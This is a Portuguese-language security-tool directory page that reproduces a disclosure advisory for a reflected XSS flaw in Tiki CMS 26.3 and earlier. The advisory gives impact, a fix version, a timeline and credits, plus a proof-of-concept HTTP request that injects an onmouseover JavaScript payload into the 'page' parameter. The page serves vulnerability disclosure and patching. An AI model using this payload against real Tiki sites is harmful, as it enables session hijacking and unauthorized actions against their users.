Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-46878-TikiCMS-XSS — CVE-2024-46878 - Vulnerabilidade de Cross-Site Scripting (XSS) Refletido no Tiki CMS | Kitploit
Ferramentas/GitHubGitHub/coldfusionx/cve-2024-46878-tikicms-xss
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubcoldfusionx/cve-2024-46878-tikicms-xss

CVE-2024-46878-TikiCMS-XSS

CVE-2024-46878 - Vulnerabilidade de Cross-Site Scripting (XSS) Refletido no Tiki CMS

Ver Repositório
há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-46878 - Vulnerabilidade de Cross-Site Scripting (XSS) Refletido no Tiki CMS

Tiki CMS - Vulnerabilidade de Cross-Site Scripting (XSS) Refletido no Parâmetro 'page'

Aviso Legal

Destinado apenas para fins educacionais, de pesquisa e defensivos. O uso não autorizado contra sistemas sem permissão é ilegal.

Resumo

Existe uma vulnerabilidade de Cross-Site Scripting (XSS) Refletido no parâmetro page do tiki-editpage.php na versão 26.3 e anteriores do Tiki. Essa vulnerabilidade permite que atacantes executem código JavaScript arbitrário por meio de um payload criado, levando ao possível acesso a informações confidenciais ou ações não autorizadas.

Produto(s) Afetado(s)

  • Produto: Tiki CMS Groupware
  • Versões: 26.3 e anteriores
  • Componente: tiki-editpage.php

Detalhes da Vulnerabilidade

A vulnerabilidade é causada pela sanitização inadequada da entrada do parâmetro page em tiki-editpage.php. A entrada fornecida pelo usuário é refletida na resposta HTTP sem codificação suficiente, permitindo a execução de JavaScript injetado.

Impacto

Permite que um atacante autenticado execute JavaScript arbitrário no navegador de outro usuário por meio de uma requisição criada, potencialmente levando ao sequestro de sessão ou ações não autorizadas.

Prova de Conceito (PoC)

Requisição

root@kitploit:~
GET /tiki-editpage.php?page=%22%20onmouseover%3Dalert(document.domain)%20 HTTP/1.1
Host: 127.0.0.1:9089
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: local_tz=Asia%2FKolkata; PHPSESSIDCV=51zQV%2BMxUnJxFY9nnRP%2FFg%3D%3D; javascript_enabled=y; PHPSESSID_CSRF=t2A6i9BjH1QHEH8KaLag0jtgT4dK9TTzyn8sOcRVwg9SMycfxWjoeYFmTykOfVjNPotrBKqsizXJ%2BrYcEXci8QPZxiSyBwA5YFLRS1S2RgxeTAI%3D; PHPSESSID=e19c8b25df427a7892245dc919be2067
Upgrade-Insecure-Requests: 1
Priority: u=0, i

poc

Remediação

O problema foi corrigido na versão 27.1 do Tiki CMS Groupware. Recomenda-se que os usuários atualizem para esta ou uma versão posterior corrigida.

Referência do Fornecedor: https://tiki.org/article514-New-Security-Updates-Released-for-Tiki-27-x-LTS-26-x-and-24-x-LTS-and-Upgrade-is-Strongly-Recommended

Cronograma

  • Reportado ao fornecedor: 5 de setembro de 2024
  • Reconhecimento pelo fornecedor: 16 de setembro de 2024
  • Corrigido na versão 27.1: 22 de dezembro de 2024
  • Divulgação pública (através deste repositório): 23 de março de 2026

Créditos

  • Sheela Sarva, Qualys
  • Mayank Deshmukh, Qualys

Referências

  • https://www.cve.org/CVERecord?id=CVE-2024-46878
  • https://tiki.org/article514-New-Security-Updates-Released-for-Tiki-27-x-LTS-26-x-and-24-x-LTS-and-Upgrade-is-Strongly-Recommended
Baixar ferramenta